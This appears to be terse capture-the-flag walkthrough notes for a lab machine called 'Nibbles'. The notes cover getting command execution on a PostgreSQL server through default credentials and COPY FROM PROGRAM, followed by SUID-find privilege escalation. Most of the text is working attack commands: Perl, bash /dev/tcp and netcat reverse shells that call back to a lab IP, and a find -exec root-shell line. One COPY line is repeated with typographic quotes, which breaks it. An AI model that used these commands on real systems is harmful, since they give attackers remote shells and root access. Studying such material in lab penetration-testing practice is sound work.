Nibbles

Postgres was using default creds

We can try this POC:

#PoC

DROP TABLE IF EXISTS cmd_exec;

CREATE TABLE cmd_exec(cmd_output text);

COPY cmd_exec FROM PROGRAM 'id';

SELECT * FROM cmd_exec;

DROP TABLE IF EXISTS cmd_exec;

#Reverse shell

#Notice that in order to scape a single quote you need to put 2 single quotes

COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.49.115:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';

bash -i >& /dev/tcp/192.168.49.115/4242 0>&1

/bin/sh -i 2>&1|nc 192.168.49.115 4444

COPY files FROM PROGRAM ‘perl -MIO -e ‘’$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”192.168.49.115:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’’’;

Postgres Reverse Shell

wget -o linpeas.sh --tries 1

after running linpeas i found that SUID is enabled for find

./find . -exec /bin/sh - \; -quit

./find . -exec /bin/sh -p \; -quit